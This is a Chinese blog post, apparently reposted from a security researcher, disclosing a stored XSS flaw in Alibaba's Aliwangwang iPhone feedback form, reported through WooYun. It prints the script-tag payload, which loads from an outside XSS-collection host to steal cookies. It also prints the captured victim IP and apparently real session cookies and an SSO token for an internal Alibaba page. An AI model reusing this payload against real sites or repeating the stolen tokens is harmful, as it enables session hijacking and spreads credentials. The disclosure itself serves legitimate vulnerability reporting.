记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

阿里巴巴存在储存型xss漏洞可获得cookies

2013-01-25 02:45

发现漏洞后提交到乌云了,今天阿里巴巴确认了,就发到博客吧。

简要描述:

xss漏洞,大家都懂的,可获得cookies

详细说明:

只是抱着试试看的态度,没想到真的出现了…
该漏洞是出现在阿里旺旺的手机客户端,由于我同时测试的旺信和阿里旺旺两个软件,都属于阿里巴巴,所以不知道是哪一个出现的。为了安全,没再测试,直接来提交了。
测试版本为手机iphone版,
在软件的【反馈】里写入xss测试代码,
<script src=”http://xss.sh3llc0de.com/?u=ddc05c”></script>
提交成功。
十分钟之内没有收到cookies,就失望了,但刚才去看了看…哈哈。

漏洞证明:

ali.png
信息
IP:121.0.29.205
地址:中国浙江杭州电信企业阿里巴巴公司
操作系统:Windows XP
浏览器:Chrome 24.0.1312.52
时间:2013-01-22 19:06:45

cookies

USER_COOKIE=BDC4D499AACAC40F7021847DB20A7620; SSO_TOKEN=594E51ADB89572C8F71E9C45F25A3684020D1640DEDF9946EAD585C231395E6711ED2B70672DF1

CDFC2D299A49F5CB04; LAST_HEART_BEAT_TIME=9411E114E035D380C6A967891863C6D3; JSESSIONID=1g8tf43ade2j2e8ihhzxm20lk

 

地址:http://mops.alibaba-inc.com/usersuggestion/index.do?pageIndex=2&source=ios&whiltelist=false

没什么技术含量,纯属盲打,期待阿里巴巴的礼物…


知识来源: www.afeng.org/539.html

阅读:128387 | 评论:1 | 标签:网络安全 阿里巴巴xss

想收藏或者和大家分享这篇好文章→复制链接地址

“阿里巴巴存在储存型xss漏洞可获得cookies”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云